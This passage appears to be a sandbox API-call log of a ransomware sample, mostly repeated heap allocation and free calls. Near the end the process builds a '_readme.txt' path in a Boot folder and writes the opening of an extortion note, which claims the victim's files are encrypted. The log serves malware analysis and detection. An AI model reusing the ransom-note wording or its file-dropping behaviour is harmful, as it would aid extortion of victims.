(in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.579] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.579] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.580] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.580] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.581] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.581] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc2e) returned 0x325c3b0 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.582] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.582] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.583] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.583] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.584] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.584] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.585] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.585] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x840) returned 0x37a2b08 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.586] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.586] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x830) returned 0x37a2b08 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc46) returned 0x325c3b0 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325c3b0 | out: hHeap=0x630000) returned 1 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a2b08 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37a2b08 | out: hHeap=0x630000) returned 1 [0227.587] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed990 | out: hHeap=0x630000) returned 1 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.587] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x860) returned 0x325c3b0 [0227.588] PathFindFileNameW (pszPath="C:\\Boot\\nl-NL\\") returned="nl-NL\\" [0227.588] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.588] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0227.588] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0227.588] PathFindFileNameW (pszPath="") returned="" [0227.588] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed968 [0227.588] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75000000 [0227.588] GetProcAddress (hModule=0x75000000, lpProcName="SHGetFolderPathW") returned 0x75085708 [0227.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x800) returned 0x325c3b0 [0227.589] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x325c3b0 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0227.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x810) returned 0x37a2b08 [0227.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed990 [0227.589] FreeLibrary (hLibModule=0x75000000) returned 1 [0227.589] PathAppendW (in: pszPath="C:\\Boot\\nl-NL\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 1 [0227.589] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x820) returned 0x37a3390 [0227.589] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed9b8 | out: hHeap=0x630000) returned 1 [0227.589] PathFileExistsW (pszPath="C:\\Boot\\nl-NL\\_readme.txt") returned 0 [0227.591] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x7d00) returned 0x37b0468 [0227.591] lstrcpyW (in: lpString1=0x37b0468, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to 